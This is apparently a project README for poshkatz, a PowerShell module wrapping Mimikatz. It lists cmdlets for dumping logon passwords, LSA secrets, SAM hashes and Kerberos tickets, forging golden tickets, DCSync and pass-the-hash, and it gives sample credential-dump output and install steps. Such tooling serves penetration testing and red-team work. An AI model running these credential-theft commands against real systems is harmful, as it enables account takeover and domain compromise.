poshkatz

poshkatz is a PowerShell module for Mimikatz that has a number of cool features!

Features

Mimiktaz tab expansion “autocomplete”

Autocompletes mimikatz commands, parameters and paramter values.

Cmdlet wrappers for Mimikatz features

• Export-MKKerberosTicket
• Get-MKCredentialVault
• Get-MKCredentialVaultCredential
• Get-MKKerberosTicket
• Get-MKLogonPassword
• Get-MKLsaCache
• Get-MKLsaSam
• Get-MKLsaSecret
• Get-MKTicket
• Grant-MKKerberosGoldenTicket
• Invoke-MKDcSync
• Invoke-MKPassTheHash

Convert Mimikatz output into PowerShell Objects

PS C:\> mimikatz sekurlsa::logonpassword exit | ConvertFrom-Mimikatz -OutputType LogonPasswords





Domain           : Window Manager

NTLMHash         :

UserName         : DWM-1

SID              : S-1-5-90-1

Password         : (null)

LogonTime        : 10/16/2018 11:27:50 AM

SHA1Hash         :

LogonServer      : (null)

AuthenticationId : 0 ; 48064 (00000000:0000bbc0)

Session          : Interactive from 1



Domain           : IRONMAN

NTLMHash         :

UserName         : IRONMANDC1$

SID              : S-1-5-20

Password         : (null)

LogonTime        : 10/16/2018 11:27:50 AM

SHA1Hash         :

LogonServer      : (null)

AuthenticationId : 0 ; 996 (00000000:000003e4)

Session          : Service from 0

Use

1. Install git
2. Install posh-git
   

   install-module posh-git

3. Build or Download a fresh copy of mimikatz
4. Import the poshkatz module
   

   git clone https://github.com/STEALTHbits/poshkatz.git
   Import-Module poshkatz.psd1

5. Ensure mimikatz.exe is in your path
6. Have some fun
   

   Get-MKLogonPassword

Copyright (c) 2018 Adam Driscoll
Source: https://github.com/STEALTHbits/